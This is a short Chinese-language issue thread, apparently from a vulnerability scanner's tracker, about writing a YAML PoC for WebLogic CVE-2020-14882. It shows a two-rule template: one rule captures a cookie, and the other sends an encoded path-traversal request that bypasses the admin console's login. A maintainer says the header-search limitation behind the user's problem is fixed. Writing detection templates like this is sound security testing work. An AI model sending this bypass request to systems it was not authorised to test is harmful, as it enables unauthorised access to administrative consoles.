POC问题

[qiaoba22]

1. search可以匹配响应头中的内容吗
2. 一个poc里希望做两条规则：规则1获取cookie，规则2请求中附带cookie然后进行测试。获取cookie的正则测试了没问题， 但是抓包发现无论如何第2个规则都不会进行请求，什么情况下才会出现这个问题。 3.希望将规则1获取的cookie写入到规则2的请求头中， headers: Cookie: {{var}} 这样编译后运行yam会报错“cannot unmarshal !!map into string” headers: Cookie: "{{var}}" 加了双引号后不再报错了，但是这样写能生效吗。

[qiaoba22]

问题poc如下 name: poc-yaml-weblogic-cve-2020-14882 rules:

• method: GET path: /console/login/LoginForm.jsp headers: Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate expression: "true" search: | Set-Cookie: (?P[^;]+)
• method: GET path: /console/css/%2e%2e%2fconsole.portal headers: Cookie: "{{var}}" Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Connection: close expression: | response.status == 200 && (response.body.bcontains(bytes(string("管理控制台"))))

[shadow1ng]

找到原因了，默认是search body，我看看怎么改吧

[shadow1ng]

已修复

[qiaoba22]

谢谢